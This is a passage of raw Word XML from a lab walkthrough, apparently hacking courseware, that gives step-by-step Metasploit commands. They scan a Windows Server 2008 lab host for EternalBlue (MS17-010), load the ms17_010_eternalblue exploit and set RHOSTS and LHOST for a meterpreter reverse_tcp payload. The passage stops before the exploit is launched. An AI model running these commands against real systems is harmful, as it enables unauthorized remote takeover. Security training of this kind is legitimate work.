          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.19.19.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to set the target as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4B0E9" w14:textId="21A7B30C"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27C0772D" wp14:editId="2B70CE51">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1746778550" name="図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2F3C232" w14:textId="6338DA07"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1DA8BB83">
          <v:shape id="_x0000_i1258" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId106" w:name="DefaultOcxName50" w:shapeid="_x0000_i1258"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to check if the machine is vulnerable. You will observe that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (Windows Server 2008) is vulnerable to Eternal Blue as shown in the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DD30D" w14:textId="6AB354E3"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6D2E52F9" wp14:editId="056765A6">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2080963706" name="図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2C46803A" w14:textId="7EC283DF"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2532181D">
          <v:shape id="_x0000_i1257" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId108" w:name="DefaultOcxName51" w:shapeid="_x0000_i1257"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, we shall search for the Eternal Blue exploit. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This displays the scanner and the exploit associated with Eternal Blue as shown in the screenshot. We will be using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> exploit to compromise the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1F721" w14:textId="7F609CD0"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0DD3DB8B" wp14:editId="099A4BF5">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="640958894" name="図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shot"/>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1628075" w14:textId="644C8368"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139A1028">
          <v:shape id="_x0000_i1256" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId110" w:name="DefaultOcxName52" w:shapeid="_x0000_i1256"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6EFAE" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>Ignore the warning message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885C4B2" w14:textId="4C5224FA"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186A8BE6" wp14:editId="38811D69">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1848896808" name="図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sho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ED7BC73" w14:textId="7649FE83"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4A85C754">
          <v:shape id="_x0000_i1255" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId112" w:name="DefaultOcxName53" w:shapeid="_x0000_i1255"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to view all the options associated with the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565752C" w14:textId="41235E5C"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093CB404" wp14:editId="3B36D202">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1533754492" name="図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sho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104CFA52" w14:textId="4EF0C280"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78D2B067">
          <v:shape id="_x0000_i1254" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId114" w:name="DefaultOcxName54" w:shapeid="_x0000_i1254"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>So, we got to know from the previous step that we need to set the values of </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Setting </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload increases the chance of gaining </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> session. Issue the following commands in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742BCD64" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="75" w:after="75"/>
        <w:ind w:left="1890"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set RHOSTS 172.19.19.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F73589C" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="75" w:after="75"/>
        <w:ind w:left="1890"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set LHOST 172.19.19.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B2613" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>
        <w:ind w:left="1170"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>172.19.19.18</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is the IP address of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Parrot</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079072BC" w14:textId="718CCFFD"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45C64D0A" wp14:editId="03D73159">
